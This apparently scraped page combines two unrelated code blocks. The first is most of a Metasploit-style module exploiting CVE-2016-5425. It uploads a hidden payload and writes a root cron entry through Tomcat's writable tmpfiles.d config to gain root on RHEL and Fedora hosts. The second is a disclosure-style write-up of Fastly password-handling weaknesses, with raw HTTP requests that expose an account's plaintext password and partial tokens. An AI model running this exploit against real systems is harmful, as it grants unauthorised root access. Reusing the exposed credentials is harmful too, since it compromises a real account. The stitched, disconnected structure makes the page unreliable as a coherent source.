'http://legalhackers.com/advisories/Tomcat-RedHat-Pkgs-Root-PrivEsc-Exploit-CVE-2016-5425.html'], ['URL', 'https://www.freedesktop.org/software/systemd/man/tmpfiles.d.html'], # general tompfiles.d info ['CVE', '2016-5425'] ], 'DisclosureDate' => '2016-10-10', 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS] } ) ) register_advanced_options [ OptString.new('WritableDir', [ true, 'A directory where we can write and execute files', '/tmp' ]), ] end # Simplify pulling the writable directory variable def base_dir datastore['WritableDir'].to_s end def tomcat_conf '/usr/lib/tmpfiles.d/tomcat.conf' end def suid?(file) get_suid_files(file).include? file end def check package = cmd_exec('rpm -qa | grep "^tomcat\-[678]"') if package.nil? || package.empty? return CheckCode::Safe('Unable to execute command to determine installed pacakges') end package = package.sub('tomcat-', '').strip # fedora based cleanup package = package.sub(/\.fc\d\d\.noarch/, '') # rhel/centos based cleanup package = package.sub(/\.el\d_\d\.noarch/, '') package = Rex::Version.new(package) # The write-up says 6, 7, 8 but doesn't include version numbers. RHEL's writeup says # only 7 is effected, so we're going to go off their write-up. if package.to_s.start_with?('7') && package < Rex::Version.new('7.0.54-8') return CheckCode::Appears("Vulnerable app version detected: #{package}") end CheckCode::Safe("Unexploitable tomcat packages found: #{package}") end def exploit # Check if we're already root if is_root? && !datastore['ForceExploit'] fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override' end unless writable? base_dir fail_with Failure::BadConfig, "#{base_dir} is not writable" end unless writable? tomcat_conf fail_with Failure::BadConfig, "#{tomcat_conf} is not writable" end vprint_status("Creating backup of #{tomcat_conf}") @tomcat_conf_content = read_file(tomcat_conf) path = store_loot( tomcat_conf, 'text/plain', rhost, @tomcat_conf_content, 'tomcat.conf' ) print_good("Original #{tomcat_conf} backed up to #{path}") # Upload payload executable payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}" vprint_status("Uploading Payload to #{payload_path}") upload_and_chmodx payload_path, generate_payload_exe register_file_for_cleanup(payload_path) # write in our payload execution vprint_status("Writing permission elevation into #{tomcat_conf}") cron_job = "/etc/cron.d/#{rand_text_alphanumeric(5..10)}" print_status("Creating cron job in #{cron_job}") # The POC shows 2 options, a cron answer, and copy bash answer. # Initially I attempted to copy our payload, set suid and root owner # however it seemed to need 2 service restart to apply all the permissions. # I never figured out why it was like that, even chaining copying bash in, then # launching the payload from the bash instance etc. We opt for the cron # which may take 1 additional minute, and rely on cron, but is much more stable cmd_exec("echo 'F #{cron_job} 0644 root root - \"* * * * * root nohup #{payload_path} & \\n\\n\"' >> #{tomcat_conf}") register_file_for_cleanup(cron_job) # we now need systemd-tmpfiles to restart print_good("Waiting #{datastore['WfsDelay']} seconds. Run the following command on the target machine: /usr/bin/systemd-tmpfiles --create - this is required to restart the tmpfiles-setup.service") succeeded = retry_until_truthy(timeout: datastore['WfsDelay']) do file? cron_job end unless succeeded print_error("#{cron_job} not found, exploit aborted") return end print_status('Waiting on cron to execute the payload (~1 minute)') end def cleanup unless @tomcat_conf_content.nil? write_file(tomcat_conf, @tomcat_conf_content) end super end end </code></pre>

<pre><code>Correspondence from Fastly declined to comment regarding new discovered vulnerabilities within their website. Poor practices regarding password changes. 1. Reset user password 2. Access link sent 3. Temporary password sent plaintext // HTTP POST request POST /user/mwebsec%40gmail.com/password/request_reset HTTP/2 Host: api.fastly.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 [...] [...] {"g-recaptcha-response":"03AFY_a8UY[...]"} [...] // HTTP response HTTP/2 200 OK Cache-Control: no-store [...] // HTTP GET request GET /auth/user/3lWtx49FrV2.../password/reset/f496875e6e1d88d80aa5.../1677948661/2f2ea8d230adaf03bd749081d... HTTP/2 Host: manage.fastly.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 [...] // HTTP response HTTP/2 200 OK Cache-Control: public, max-age=60, stale-if-error=1209600, stale-while-revalidate=600 [...] Weak Pwd requirements 1. Login to user account 2. Click Account -> Personal Profile 3. Select Change Password -> Current Password -> FastLy%2540!1M 4. Select New Password -> P.P.P.P.P.P.P -> Confirm Password -> P.P.P.P.P.P.P 5. Select Sign Out Option 6. Login with new password // HTTP POST request POST /oauth/password HTTP/2 Host: api.fastly.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 [...] [...] client_id=fastly-ui&grant_type=password&new_password=P.P.P.P.P.P.P&old_password=FastLy%2540!1M&username=mwebsec% 40gmail.com [...] // HTTP response HTTP/2 401 Unauthorized Status: 401 Unauthorized Cache-Control: no-store Content-Type: application/json [...] [...] {"msg":"Token 3kzBPKXbsbtZBl9..."} [...] // HTTP POST request POST /oauth/access_token HTTP/2 Host: api.fastly.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 [...] [...] client_id=fastly-ui&grant_type=password&password=P.P.P.P.P.P.P&username=mwebsec% 40gmail.com [...] // HTTP response HTTP/2 200 OK Status: 200 OK [...] [...] {"id":"7IU53vPHZ...", "name":"manage.fastly.com browser session", "user_id":"3lWtx49FrV...", "customer_id":"535znFHg...", [...] "token_type":"bearer", "scope":"global", "services":[], "access_token":"qwdBQF43O..."} [...] </code></pre>